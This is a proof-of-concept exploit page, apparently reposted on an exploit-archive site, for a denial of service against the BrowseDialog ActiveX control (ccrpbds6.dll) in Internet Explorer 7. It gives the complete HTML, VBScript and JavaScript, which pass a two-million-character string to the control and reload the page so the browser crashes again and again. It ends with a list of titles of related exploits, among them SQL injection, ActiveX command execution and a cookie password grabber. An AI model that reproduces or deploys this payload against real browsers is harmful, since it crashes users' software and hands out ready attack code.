<!--
-----------------------------------------------------------------------------------------------------------
BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------------------------------------
-->
<html>
<object classid='clsid:19E6E148-BAEC-11D2-B03A-EAFC20524153' id='CCRP_BDc'></object>
<script language='vbscript'> argCount = 1 arg1=String(2000000, "A") CCRP_BDc.SelectedFolder = arg1
</script> <script language='javascript'>
document.location.reload()
</script>//http://www.leftworld.net
【BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service】相关文章:
★ Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit
★ Joomla Component n-forms 1.01 Blind SQL Injection Exploit
★ Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit
★ Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit
★ Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit
★ Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit
★ MS Windows (.doc File) Malformed Pointers Denial of Service Exploit
★ Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit
★ Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC
★ MS Windows (MessageBox) Memory Corruption Local Denial of Service